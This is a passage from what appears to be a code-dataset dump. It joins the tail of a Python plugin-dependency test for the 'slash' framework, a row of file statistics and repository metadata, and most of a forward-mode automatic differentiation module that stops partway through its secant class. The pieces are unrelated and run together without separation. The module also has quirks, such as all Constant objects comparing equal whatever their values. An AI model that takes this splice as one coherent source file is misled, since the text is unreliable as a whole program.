    class PluginAParent(slash.plugins.interface.PluginInterface):

        def test_start(self):
            test_start_a()

        def error_added(self, result, error):  # pylint: disable=unused-argument
            pass

        def session_end(self):
            pass

    @slash.plugins.provides('y')
    class PluginA(PluginAParent):

        def get_name(self):
            return 'plugin a'

        @slash.plugins.provides('x')
        def session_start(self):
            # Overrides empty registration of PluginAParent
            session_start_a()

        @slash.plugins.provides('x')
        def test_start(self):
            # Overrides "real" registration of PluginAParent
            test_start_a()

        def error_added(self, result, error):  # pylint: disable=unused-argument
            # Overrides "real" registration of PluginAParent
            pass

        def test_end(self):
            # Overrides empty registration of PluginAParent
            pass

    @slash.plugins.needs('x')
    class PluginBParent(slash.plugins.interface.PluginInterface):

        def session_start(self):
            session_start_b()

        def error_added(self, result, error):  # pylint: disable=unused-argument
            pass

        def test_start(self):
            test_start_b()

        def test_end(self):
            pass

    @slash.plugins.needs('y')
    class PluginB(PluginBParent):

        def get_name(self):
            return 'plugin b'

        @slash.plugins.needs('z')
        def session_end(self):
            pass

    for plugin_cls in [PluginA, PluginB]:
        slash.plugins.manager.install(plugin_cls(), activate_later=True)
    slash.plugins.manager.activate_pending_plugins()

    # while A is active, x and y are provided; only session_end's z is unmet
    slash.hooks.session_start()  # pylint: disable=no-member
    assert session_start_a.timestamp < session_start_b.timestamp
    slash.hooks.test_start()  # pylint: disable=no-member
    assert test_start_a.timestamp < test_start_b.timestamp
    slash.hooks.error_added(result=None, error=None)  # pylint: disable=no-member
    slash.hooks.test_end()  # pylint: disable=no-member
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.session_end()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['z'])

    # with A deactivated, every hook of B reports its unmet needs
    slash.plugins.manager.deactivate('plugin a')
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.session_start()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x', 'y'])
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.test_start()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x', 'y'])
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.error_added(result=None, error=None)  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x', 'y'])
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.test_end()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x', 'y'])
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.session_end()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x', 'y', 'z'])
def autoname(plugin):
    """Class decorator: attach a get_name() that derives the plugin name
    from the (lower-cased) class name."""
    def _name_from_class(self):
        return type(self).__name__.lower()

    plugin.get_name = _name_from_class
    return plugin
| 33.814685
| 168
| 0.668907
| 2,266
| 19,342
| 5.560018
| 0.066637
| 0.077149
| 0.044051
| 0.061672
| 0.888245
| 0.866497
| 0.821891
| 0.809032
| 0.796968
| 0.796968
| 0
| 0.002867
| 0.224537
| 19,342
| 571
| 169
| 33.873905
| 0.837122
| 0.2234
| 0
| 0.889535
| 0
| 0
| 0.023706
| 0.00447
| 0
| 0
| 0
| 0
| 0.090116
| 1
| 0.218023
| false
| 0.052326
| 0.017442
| 0.055233
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
81b33657547a44b5052f43438ac698b630eaded1
| 59,617
|
py
|
Python
|
autodiff/forward.py
|
D-Y-F-S/cs207-FinalProject
|
57270ccbf7db7f3c1f4deff97af67b3c962fb205
|
[
"MIT"
] | null | null | null |
autodiff/forward.py
|
D-Y-F-S/cs207-FinalProject
|
57270ccbf7db7f3c1f4deff97af67b3c962fb205
|
[
"MIT"
] | null | null | null |
autodiff/forward.py
|
D-Y-F-S/cs207-FinalProject
|
57270ccbf7db7f3c1f4deff97af67b3c962fb205
|
[
"MIT"
] | 2
|
2018-12-15T20:45:53.000Z
|
2018-12-15T21:43:32.000Z
|
"""
This file contains the central data structure and functions related to the
forward mode auto differentiation.
"""
import numpy as np
class Expression:
    """
    Base node of an expression tree for forward-mode auto differentiation.
    It is the super class for Variable and Constant.
    """
    def __init__(self, ele_func, sub_expr1, sub_expr2=None):
        """
        The constructor for the Expression class.
        PARAMETERS:
        =======
        ele_func: the elementary function (operator) creating this expression
        sub_expr1: variable/constant/expression composing this expression
        sub_expr2: second operand composing this expression, set to None
            for unary operations
        """
        self._ele_func = ele_func
        self._sub_expr1 = sub_expr1
        self._sub_expr2 = sub_expr2
        self.val = None
        self.bder = 0  # accumulator read/written by backward-mode passes

    def evaluation_at(self, val_dict):
        """
        The wrapper function for the individual evaluation_at function of
        self._ele_func.
        PARAMETERS:
        =======
        val_dict: a dictionary containing variables and their values.
        RETURNS
        ========
        a scalar value
        """
        # self._sub_expr2 is None implies that self._ele_func is a unary operator
        if self._sub_expr2 is None:
            return self._ele_func.evaluation_at(
                self._sub_expr1, val_dict)
        # self._sub_expr2 not None implies that self._ele_func is a binary operator
        else:
            return self._ele_func.evaluation_at(
                self._sub_expr1, self._sub_expr2, val_dict)

    def derivative_at(self, var, val_dict, order=1):
        """
        The wrapper function for the individual derivative_at function of
        self._ele_func.
        PARAMETERS:
        =======
        var: variable (or tuple of two variables for a mixed second-order
            derivative) with respect to which the derivative is taken
        val_dict: a dictionary containing variables and their values.
        order: derivative order (1 or 2); overridden by len(var) when var
            is a tuple
        RETURNS
        ========
        a scalar value
        """
        if type(var) is tuple: order = len(var)
        # d(self)/d(self) is 1; every higher-order self-derivative is 0
        if var is self:
            if order == 1: return 1.0
            else: return 0.0
        # sub_expr2 being None implies that _ele_func is a unary operator
        if self._sub_expr2 is None:
            return self._ele_func.derivative_at(
                self._sub_expr1, var, val_dict, order)
        # sub_expr2 not None implies that _ele_func is a binary operator
        else:
            return self._ele_func.derivative_at(
                self._sub_expr1, self._sub_expr2, var, val_dict, order)

    def back_derivative(self, var, val_dict):
        """
        The wrapper function for the individual backderivative_at function
        of self._ele_func.
        PARAMETERS:
        =======
        var: variable with respect to which the derivative is calculated
        val_dict: a dictionary containing variables and their values.
            Variables in val_dict are atomic and cannot be further decomposed.
        RETURNS
        ========
        derivative of var with respect to the immediate parent that contains var
        """
        if var is self: return 1.0
        if self._sub_expr2 is None:
            return self._ele_func.backderivative_at(self._sub_expr1, var)
        else:
            return self._ele_func.backderivative_at(self._sub_expr1,
                                                    self._sub_expr2, var)

    def gradient_at(self, val_dict, returns_dict=False):
        """
        Calculate the 1st derivative w.r.t. each variable in val_dict
        using forward mode.
        PARAMETERS:
        =======
        val_dict: a dictionary containing variables and their values.
        returns_dict: if True return a {variable: derivative} dict,
            otherwise a 1-D numpy array ordered like val_dict.keys()
        RETURNS
        ========
        gradient of this expression, as a dict or numpy array
        """
        if returns_dict:
            return {v: self.derivative_at(v, val_dict) for v in val_dict.keys()}
        return np.array([self.derivative_at(var, val_dict, order=1)
                         for var in val_dict.keys()])

    def hessian_at(self, val_dict):
        """
        Calculate all 2nd derivatives w.r.t. the variables in val_dict
        using forward mode.
        PARAMETERS:
        =======
        val_dict: a dictionary containing variables and their values.
        RETURNS
        ========
        the Hessian as a 2-D numpy array
        """
        return np.array([
            [self.derivative_at((var1, var2), val_dict, order=2)
             for var1 in val_dict.keys()]
            for var2 in val_dict.keys()
        ])

    def __neg__(self):
        """ Implement dunder method for neg """
        return Expression(Neg, self)

    def __add__(self, another):
        """ Implement dunder method for add """
        if isinstance(another, Expression):
            return Expression(Add, self, another)
        # if the other operand is not an Expression, then it must be a number;
        # the number then should be converted to a Constant
        else:
            return Expression(Add, self, Constant(another))

    def __radd__(self, another):
        """ Implement dunder method for right add """
        if isinstance(another, Expression):
            return Expression(Add, another, self)
        else:
            return Expression(Add, Constant(another), self)

    def __sub__(self, another):
        """ Implement dunder method for subtraction """
        if isinstance(another, Expression):
            return Expression(Sub, self, another)
        else:
            return Expression(Sub, self, Constant(another))

    def __rsub__(self, another):
        """ Implement dunder method for right subtraction """
        if isinstance(another, Expression):
            return Expression(Sub, another, self)
        else:
            return Expression(Sub, Constant(another), self)

    def __mul__(self, another):
        """ Implement dunder method for multiplication """
        if isinstance(another, Expression):
            return Expression(Mul, self, another)
        else:
            return Expression(Mul, self, Constant(another))

    def __rmul__(self, another):
        """ Implement dunder method for right multiplication """
        if isinstance(another, Expression):
            return Expression(Mul, another, self)
        else:
            return Expression(Mul, Constant(another), self)

    def __truediv__(self, another):
        """ Implement dunder method for division """
        if isinstance(another, Expression):
            return Expression(Div, self, another)
        else:
            return Expression(Div, self, Constant(another))

    def __rtruediv__(self, another):
        """ Implement dunder method for right division """
        if isinstance(another, Expression):
            return Expression(Div, another, self)
        else:
            return Expression(Div, Constant(another), self)

    def __pow__(self, another):
        """ Implement dunder method for power """
        if isinstance(another, Expression):
            return Expression(Pow, self, another)
        else:
            return Expression(Pow, self, Constant(another))

    def __rpow__(self, another):
        """ Implement dunder method for right power """
        if isinstance(another, Expression):
            return Expression(Pow, another, self)
        else:
            return Expression(Pow, Constant(another), self)

    def __eq__(self, another):
        """ Implement dunder method for equal """
        if not isinstance(another, Expression):
            return False
        return self._ele_func == another._ele_func \
            and self._sub_expr1 == another._sub_expr1 \
            and self._sub_expr2 == another._sub_expr2

    def __ne__(self, another):
        """ Implement dunder method for not equal """
        # BUG FIX: the original returned ``~self.__eq__(another)``.  Bitwise
        # NOT of a bool gives -2 (for True) or -1 (for False) — both truthy —
        # so ``!=`` always evaluated true.  Use logical negation instead.
        return not self.__eq__(another)

    def __hash__(self):
        """ Implement dunder method for hash (identity-based) """
        return object.__hash__(self)
class Variable(Expression):
    """
    Leaf node representing a variable; its value is looked up (by identity)
    in the val_dict supplied at evaluation time.
    """
    def __init__(self):
        """
        The constructor for the Variable class.
        It has no parameters: a Variable carries no state of its own;
        its identity is its meaning.
        """
        self.val = None
        self.bder = 0  # accumulator read/written by backward-mode passes
        return

    def evaluation_at(self, val_dict):
        """
        Evaluate this variable: return its value from val_dict.
        PARAMETERS:
        =======
        val_dict: a dictionary containing variables and their values.
        RETURNS
        ========
        a scalar value
        """
        return val_dict[self]

    def derivative_at(self, var, val_dict, order=1):
        """
        Derivative of this variable: 1.0 iff var is this variable and
        order == 1, otherwise 0.0.
        PARAMETERS:
        =======
        var: variable with respect to which the derivative is taken
        val_dict: a dictionary containing variables and their values.
        order: default 1 for the 1st derivative, 2 for higher order
        RETURNS
        ========
        a scalar value
        """
        if order == 1:
            return 1.0 if var is self else 0.0
        else:
            return 0.0

    def __eq__(self, another):
        """ Variables compare equal only by identity """
        return another is self

    def __ne__(self, another):
        """ Implement dunder method for not equal """
        # BUG FIX: the original returned ``~self.__eq__(another)``.  Bitwise
        # NOT of a bool is -2 or -1 — both truthy — so ``!=`` was always
        # true.  Use logical negation instead.
        return not self.__eq__(another)

    def __hash__(self):
        """ Implement dunder method for hash """
        return Expression.__hash__(self)
class Constant(Expression):
    """
    Leaf node representing a constant.
    Attributes:
        val: value of the constant
    """
    def __init__(self, val):
        """
        The constructor for the Constant class.
        PARAMETERS:
        =======
        val: the value of the constant object
        """
        self.val = val

    def evaluation_at(self, val_dict):
        """
        Evaluate this constant: always its stored value.
        PARAMETERS:
        =======
        val_dict: a dictionary containing variables and their values
            (unused — a constant's value never depends on variables).
        RETURNS
        ========
        a scalar value
        """
        return self.val

    def derivative_at(self, var, val_dict, order=1):
        """
        Derivative of a constant: always 0.0, for any variable and order.
        PARAMETERS:
        =======
        var: variable with respect to which the derivative is taken
        val_dict: a dictionary containing variables and their values.
        order: default 1 for the 1st derivative, 2 for higher order
        RETURNS
        ========
        a scalar value
        """
        return 0.0

    def __eq__(self, another):
        """ Implement dunder method for equal """
        # NOTE(review): any two Constant instances compare equal regardless
        # of their values — confirm this is intended before relying on it.
        if isinstance(another, Constant): return True
        else: return False

    def __ne__(self, another):
        """ Implement dunder method for not equal """
        # BUG FIX: the original returned ``~self.__eq__(another)``.  Bitwise
        # NOT of a bool is -2 or -1 — both truthy — so ``!=`` was always
        # true.  Use logical negation instead.
        return not self.__eq__(another)

    def __hash__(self):
        """ Implement dunder method for hash """
        return Expression.__hash__(self)
class VectorFunction:
    """
    Represents a vector-valued function: a sequence of scalar
    expressions evaluated and differentiated together.
    Attributes:
        _exprlist: the component expressions (copied at construction)
    """
    def __init__(self, exprlist):
        """Store a shallow copy of `exprlist` so later mutation of the
        caller's list does not affect this function."""
        self._exprlist = exprlist.copy()
    def evaluation_at(self, val_dict):
        """Evaluate every component under `val_dict`.

        Returns a 1-D numpy array of component values."""
        values = [component.evaluation_at(val_dict)
                  for component in self._exprlist]
        return np.array(values)
    def gradient_at(self, var, val_dict):
        """First derivative of every component with respect to `var`.

        Returns a 1-D numpy array of partial derivatives."""
        partials = [component.derivative_at(var, val_dict)
                    for component in self._exprlist]
        return np.array(partials)
    def jacobian_at(self, val_dict):
        """Jacobian matrix of the vector function.

        Entry (i, j) is d(component_i)/d(var_j), with the variables
        taken in `val_dict` iteration (insertion) order."""
        columns = [self.gradient_at(var, val_dict) for var in val_dict]
        return np.array(columns).transpose()
class Add:
    """Static helpers implementing the addition operator (f + g)."""
    @staticmethod
    def evaluation_at(sub_expr1, sub_expr2, val_dict):
        """Return f + g evaluated under `val_dict`."""
        left = sub_expr1.evaluation_at(val_dict)
        right = sub_expr2.evaluation_at(val_dict)
        return left + right
    @staticmethod
    def derivative_at(sub_expr1, sub_expr2, var, val_dict, order=1):
        """d(f + g) = df + dg, at any supported order (var may be a
        tuple for mixed second derivatives)."""
        left = sub_expr1.derivative_at(var, val_dict, order)
        right = sub_expr2.derivative_at(var, val_dict, order)
        return left + right
    @staticmethod
    def backderivative_at(sub_expr1, sub_expr2, var):
        """Local partial for back propagation: d(f + g)/df = d(f + g)/dg = 1."""
        return 1
class Sub:
    """Static helpers implementing the subtraction operator (f - g)."""
    @staticmethod
    def evaluation_at(sub_expr1, sub_expr2, val_dict):
        """Return f - g evaluated under `val_dict`."""
        minuend = sub_expr1.evaluation_at(val_dict)
        subtrahend = sub_expr2.evaluation_at(val_dict)
        return minuend - subtrahend
    @staticmethod
    def derivative_at(sub_expr1, sub_expr2, var, val_dict, order=1):
        """d(f - g) = df - dg, at any supported order (var may be a
        tuple for mixed second derivatives)."""
        return sub_expr1.derivative_at(var, val_dict, order) - \
               sub_expr2.derivative_at(var, val_dict, order)
    @staticmethod
    def backderivative_at(sub_expr1, sub_expr2, var):
        """Local partial for back propagation: +1 with respect to the
        minuend, -1 with respect to the subtrahend (implicitly None
        when `var` is neither child, matching the original contract)."""
        if var == sub_expr1:
            return 1
        if var == sub_expr2:
            return -1
class Mul:
    """Static helpers implementing the multiplication operator (f * g)."""
    @staticmethod
    def evaluation_at(sub_expr1, sub_expr2, val_dict):
        """Return f * g evaluated under `val_dict`."""
        return sub_expr1.evaluation_at(val_dict) * \
               sub_expr2.evaluation_at(val_dict)
    @staticmethod
    def derivative_at(sub_expr1, sub_expr2, var, val_dict, order=1):
        """Product-rule derivative of f * g with respect to `var`.

        `var` may be a tuple (var1, var2) for a mixed second derivative.
        Raises NotImplementedError for order > 2.
        """
        if order == 1:
            # (fg)' = f'g + fg'
            return sub_expr1.derivative_at(var, val_dict) * \
                   sub_expr2.evaluation_at(val_dict) + \
                   sub_expr1.evaluation_at(val_dict) * \
                   sub_expr2.derivative_at(var, val_dict)
        elif order == 2:
            if type(var) is not tuple:
                # a pure second derivative is the mixed one with var repeated
                return Mul.derivative_at(sub_expr1, sub_expr2, (var, var), val_dict, order=2)
            var1, var2 = var
            # (fg)'' = f''g + g''f + f'(var1)g'(var2) + g'(var1)f'(var2)
            t1 = sub_expr1.derivative_at(var, val_dict, order=2) \
                 * sub_expr2.evaluation_at(val_dict)
            t2 = sub_expr2.derivative_at(var, val_dict, order=2) \
                 * sub_expr1.evaluation_at(val_dict)
            t3 = sub_expr1.derivative_at(var1, val_dict, order=1) \
                 * sub_expr2.derivative_at(var2, val_dict, order=1)
            t4 = sub_expr2.derivative_at(var1, val_dict, order=1) \
                 * sub_expr1.derivative_at(var2, val_dict, order=1)
            return t1 + t2 + t3 + t4
        else:
            raise NotImplementedError('3rd order or higher derivatives are not implemented.')
    @staticmethod
    def backderivative_at(sub_expr1, sub_expr2, var):
        """Local partial for back propagation: the other factor's cached
        value (d(fg)/df = g, d(fg)/dg = f)."""
        if var == sub_expr1:
            return sub_expr2.val
        return sub_expr1.val
class Div:
    """Static helpers implementing the division operator (f / g)."""
    @staticmethod
    def evaluation_at(sub_expr1, sub_expr2, val_dict):
        """
        Compute division of sub_expr1 by sub_expr2 using inputs of variable
        values from val_dict.
        INPUTS
        =======
        sub_expr1: expression or constant (numerator f)
        sub_expr2: expression or constant (denominator g)
        val_dict: a dictionary containing variable name and values.
        RETURNS
        ========
        sub_expr1 / sub_expr2
        """
        return sub_expr1.evaluation_at(val_dict) / \
               sub_expr2.evaluation_at(val_dict)
    @staticmethod
    def derivative_at(sub_expr1, sub_expr2, var, val_dict, order=1):
        """
        Quotient-rule derivative of f / g with respect to var.
        INPUTS
        =======
        sub_expr1: expression or constant (numerator f)
        sub_expr2: expression or constant (denominator g)
        val_dict: a dictionary containing variable name and values.
        var: variable of interest; may be a tuple (var1, var2) for a
             mixed second derivative
        order: default 1; set to 2 for the 2nd derivative
        RETURNS
        ========
        the requested derivative; raises NotImplementedError for order > 2
        """
        if order == 1:
            # (f/g)' = f'/g - f g'/g^2
            return sub_expr1.derivative_at(var, val_dict) / \
                   sub_expr2.evaluation_at(val_dict) - \
                   sub_expr1.evaluation_at(val_dict) * \
                   sub_expr2.derivative_at(var, val_dict) / \
                   sub_expr2.evaluation_at(val_dict)**2
        elif order == 2:
            if type(var) is tuple:
                var1, var2 = var
                f = sub_expr1.evaluation_at(val_dict)
                g = sub_expr2.evaluation_at(val_dict)
                # (f/g)'' = f''/g - f g''/g^2
                #           - (f'(v1) g'(v2) + f'(v2) g'(v1))/g^2
                #           + 2 f g'(v1) g'(v2)/g^3
                # BUG FIX: term1 must differentiate the NUMERATOR and term2
                # the DENOMINATOR; the original had sub_expr1/sub_expr2
                # swapped in these two terms.
                term1 = 1/g * sub_expr1.derivative_at(var, val_dict, order=2)
                term2 = -f/g**2 * sub_expr2.derivative_at(var, val_dict, order=2)
                term3 = -1/g**2 * sub_expr1.derivative_at(var1, val_dict, order=1) \
                        * sub_expr2.derivative_at(var2, val_dict, order=1)
                term4 = -1/g**2 * sub_expr1.derivative_at(var2, val_dict, order=1) \
                        * sub_expr2.derivative_at(var1, val_dict, order=1)
                term5 = 2*f/g**3 * sub_expr2.derivative_at(var1, val_dict, order=1) \
                        * sub_expr2.derivative_at(var2, val_dict, order=1)
                return term1 + term2 + term3 + term4 + term5
            else:
                return Div.derivative_at(sub_expr1, sub_expr2, (var, var), val_dict, order=2)
        else: raise NotImplementedError('3rd order or higher derivatives are not implemented.')
    @staticmethod
    def backderivative_at(sub_expr1, sub_expr2, var):
        """
        Local partial for back propagation, using cached .val fields:
        d(f/g)/df = 1/g, d(f/g)/dg = -f/g^2 (implicitly None otherwise).
        """
        if var == sub_expr1:
            return 1/sub_expr2.val
        elif var == sub_expr2:
            return -sub_expr1.val/sub_expr2.val**2
class Pow:
    """Static helpers implementing f ** p, the exponent p treated as constant."""
    @staticmethod
    def evaluation_at(sub_expr1, sub_expr2, val_dict):
        """Return f ** p evaluated under `val_dict`."""
        return np.power(sub_expr1.evaluation_at(val_dict),
                        sub_expr2.evaluation_at(val_dict))
    @staticmethod
    def derivative_at(sub_expr1, sub_expr2, var, val_dict, order=1):
        """Power-rule derivative of f ** p with respect to `var`.

        The exponent is evaluated once and treated as a constant during
        differentiation. `var` may be a tuple (var1, var2) for a mixed
        second derivative; order > 2 raises NotImplementedError.
        """
        p = sub_expr2.evaluation_at(val_dict)
        if order == 1:
            # p f^(p-1) f'
            return p*np.power(sub_expr1.evaluation_at(val_dict), p-1.0) \
                   * sub_expr1.derivative_at(var, val_dict)
        elif order == 2:
            if type(var) is not tuple:
                return Pow.derivative_at(sub_expr1, sub_expr2, (var, var), val_dict, order=2)
            var1, var2 = var
            # p f^(p-1) f'' + p(p-1) f^(p-2) f'(var1) f'(var2)
            t1 = p*np.power(sub_expr1.evaluation_at(val_dict), p-1.0) \
                 * sub_expr1.derivative_at((var1, var2), val_dict, order=2)
            t2 = p*(p-1.0)*np.power(sub_expr1.evaluation_at(val_dict), p-2.0) \
                 * sub_expr1.derivative_at(var1, val_dict, order=1) \
                 * sub_expr1.derivative_at(var2, val_dict, order=1)
            return t1 + t2
        else:
            raise NotImplementedError('3rd order or higher derivatives are not implemented.')
    @staticmethod
    def backderivative_at(sub_expr1, sub_expr2, var):
        """Local partial for back propagation: p * f^(p-1), using the
        children's cached .val fields."""
        p = sub_expr2.val
        return p*np.power(sub_expr1.val, p-1.0)
def power(expr, p):
    """Return an Expression raising `expr` to the constant power `p`."""
    return Expression(Pow, expr, Constant(p))
def sqrt(expr):
    """Return an Expression for the square root of `expr` (expr ** 0.5)."""
    return Expression(Pow, expr, Constant(0.5))
class Exp:
    """Static helpers implementing the exponential elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """Return exp(f) evaluated under `val_dict`."""
        return np.exp(sub_expr1.evaluation_at(val_dict))
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """Chain-rule derivative of exp(f) with respect to `var`.

        `var` may be a tuple (var1, var2) for a mixed second derivative.
        Raises NotImplementedError for order > 2.
        """
        if order == 1:
            # exp(f) f'
            return sub_expr1.derivative_at(var, val_dict) * \
                   np.exp(sub_expr1.evaluation_at(val_dict))
        elif order == 2:
            if type(var) is not tuple:
                return Exp.derivative_at(sub_expr1, (var, var), val_dict, order=2)
            var1, var2 = var
            inner = sub_expr1.evaluation_at(val_dict)
            # exp(f) f'' + exp(f) f'(var1) f'(var2)
            t1 = np.exp(inner) * sub_expr1.derivative_at(var, val_dict, order=2)
            t2 = np.exp(inner) * sub_expr1.derivative_at(var1, val_dict, order=1) \
                 * sub_expr1.derivative_at(var2, val_dict, order=1)
            return t1 + t2
        else:
            raise NotImplementedError('3rd order or higher derivatives are not implemented.')
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: exp evaluated at the
        child's cached value."""
        return np.exp(sub_expr1.val)
def exp(expr):
    """Return an Expression applying the exponential function to `expr`."""
    return Expression(Exp, expr)
class Log:
    """Static helpers implementing the natural-logarithm elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """Return ln(f) evaluated under `val_dict`."""
        return np.log(sub_expr1.evaluation_at(val_dict))
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """Chain-rule derivative of ln(f) with respect to `var`.

        `var` may be a tuple (var1, var2) for a mixed second derivative.
        Raises NotImplementedError for order > 2.
        """
        if order == 1:
            # (ln f)' = f'/f
            return 1 / sub_expr1.evaluation_at(val_dict) * sub_expr1.derivative_at(var, val_dict)
        elif order == 2:
            if type(var) is tuple:
                var1, var2 = var
                f = sub_expr1.evaluation_at(val_dict)
                # (ln f)'' = f''/f - f'(var1) f'(var2)/f^2
                term1 = 1/f * sub_expr1.derivative_at(var, val_dict, order=2)
                term2 = -1/f**2 * sub_expr1.derivative_at(var1, val_dict, order=1) \
                        * sub_expr1.derivative_at(var2, val_dict, order=1)
                return term1 + term2
            else:
                return Log.derivative_at(sub_expr1, (var, var), val_dict, order=2)
        else: raise NotImplementedError('3rd order or higher derivatives are not implemented.')
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: 1/f at the cached value.

        Fix: the original omitted @staticmethod, unlike every sibling
        operator class; the guarded original behavior (None when
        sub_expr1 != var) is preserved.
        """
        if sub_expr1 == var:
            return 1/sub_expr1.val
def log(expr):
    """Return an Expression applying the natural logarithm to `expr`."""
    return Expression(Log, expr)
class Neg:
    """Static helpers implementing unary negation (-f)."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """Return -f evaluated under `val_dict`."""
        return -sub_expr1.evaluation_at(val_dict)
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """d(-f) = -df at any supported order (the order is simply
        forwarded to the child expression)."""
        return -sub_expr1.derivative_at(var, val_dict, order)
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: d(-f)/df = -1."""
        return -1
class Sin:
    """Static helpers implementing the sine elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """Return sin(f) evaluated under `val_dict`."""
        return np.sin(sub_expr1.evaluation_at(val_dict))
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """Chain-rule derivative of sin(f) with respect to `var`.

        `var` may be a tuple (var1, var2) for a mixed second derivative.
        Raises NotImplementedError for order > 2.
        """
        if order == 1:
            # cos(f) f'
            return sub_expr1.derivative_at(var, val_dict) * \
                   np.cos(sub_expr1.evaluation_at(val_dict))
        elif order == 2:
            if type(var) is not tuple:
                return Sin.derivative_at(sub_expr1, (var, var), val_dict, order=2)
            var1, var2 = var
            inner = sub_expr1.evaluation_at(val_dict)
            # cos(f) f'' - sin(f) f'(var1) f'(var2)
            t1 = np.cos(inner) * sub_expr1.derivative_at(var, val_dict, order=2)
            t2 = -np.sin(inner) * sub_expr1.derivative_at(var1, val_dict, order=1) \
                 * sub_expr1.derivative_at(var2, val_dict, order=1)
            return t1 + t2
        else:
            raise NotImplementedError('3rd order or higher derivatives are not implemented.')
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: cos at the cached value."""
        return np.cos(sub_expr1.val)
def sin(expr):
    """Return an Expression applying the sine function to `expr`."""
    return Expression(Sin, expr)
class Cos:
    """Static helpers implementing the cosine elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """Return cos(f) evaluated under `val_dict`."""
        return np.cos(sub_expr1.evaluation_at(val_dict))
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """Chain-rule derivative of cos(f) with respect to `var`.

        `var` may be a tuple (var1, var2) for a mixed second derivative.
        Raises NotImplementedError for order > 2.
        """
        if order == 1:
            # -sin(f) f'
            return -sub_expr1.derivative_at(var, val_dict, order) * \
                   np.sin(sub_expr1.evaluation_at(val_dict))
        elif order == 2:
            if type(var) is not tuple:
                return Cos.derivative_at(sub_expr1, (var, var), val_dict, order=2)
            var1, var2 = var
            inner = sub_expr1.evaluation_at(val_dict)
            # -sin(f) f'' - cos(f) f'(var1) f'(var2)
            t1 = -np.sin(inner) * sub_expr1.derivative_at(var, val_dict, order=2)
            t2 = -np.cos(inner) * sub_expr1.derivative_at(var1, val_dict, order=1) \
                 * sub_expr1.derivative_at(var2, val_dict, order=1)
            return t1 + t2
        else:
            raise NotImplementedError('3rd order or higher derivatives are not implemented.')
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: -sin at the cached value."""
        return -np.sin(sub_expr1.val)
def cos(expr):
    """Return an Expression applying the cosine function to `expr`."""
    return Expression(Cos, expr)
class Tan:
    """Static helpers implementing the tangent elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """Return tan(f) evaluated under `val_dict`."""
        return np.tan(sub_expr1.evaluation_at(val_dict))
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """Chain-rule derivative of tan(f) with respect to `var`.

        `var` may be a tuple (var1, var2) for a mixed second derivative.
        Raises NotImplementedError for order > 2.
        """
        if order == 1:
            # f' / cos(f)^2
            return sub_expr1.derivative_at(var, val_dict) /(np.cos(sub_expr1.evaluation_at(val_dict))**2)
        elif order == 2:
            if type(var) is not tuple:
                return Tan.derivative_at(sub_expr1, (var, var), val_dict, order=2)
            var1, var2 = var
            inner = sub_expr1.evaluation_at(val_dict)
            # f''/cos(f)^2 + 2 tan(f) f'(var1) f'(var2)/cos(f)^2
            t1 = 1/(np.cos(inner)**2) * sub_expr1.derivative_at(var, val_dict, order=2)
            t2 = 2*np.tan(inner)/(np.cos(inner)**2) \
                 * sub_expr1.derivative_at(var1, val_dict, order=1) \
                 * sub_expr1.derivative_at(var2, val_dict, order=1)
            return t1 + t2
        else:
            raise NotImplementedError('3rd order or higher derivatives are not implemented.')
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: sec^2 at the cached value."""
        return 1/(np.cos(sub_expr1.val)**2)
def tan(expr):
    """Return an Expression applying the tangent function to `expr`."""
    return Expression(Tan, expr)
class Cotan:
    """Static helpers implementing the cotangent elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
        """Return cotan(f) = 1/tan(f) evaluated under `val_dict`."""
        return 1/np.tan(sub_expr1.evaluation_at(val_dict))
    @staticmethod
    def derivative_at(sub_expr1, var, val_dict, order=1):
        """First derivative of cotan(f): -f' / sin(f)^2.

        Only order 1 is supported; higher orders raise NotImplementedError.
        """
        if order != 1:
            raise NotImplementedError('higher order derivatives not implemented for cotan.')
        return -sub_expr1.derivative_at(var, val_dict)/(np.sin(sub_expr1.evaluation_at(val_dict))**2)
    @staticmethod
    def backderivative_at(sub_expr1, var):
        """Local partial for back propagation: -1/sin^2 at the cached value."""
        return -1/(np.sin(sub_expr1.val)**2)
def cotan(expr):
    """Return an Expression applying the cotangent function to `expr`."""
    return Expression(Cotan, expr)
class Sec:
    """Static helpers implementing the secant elementary function."""
    @staticmethod
    def evaluation_at(sub_expr1, val_dict):
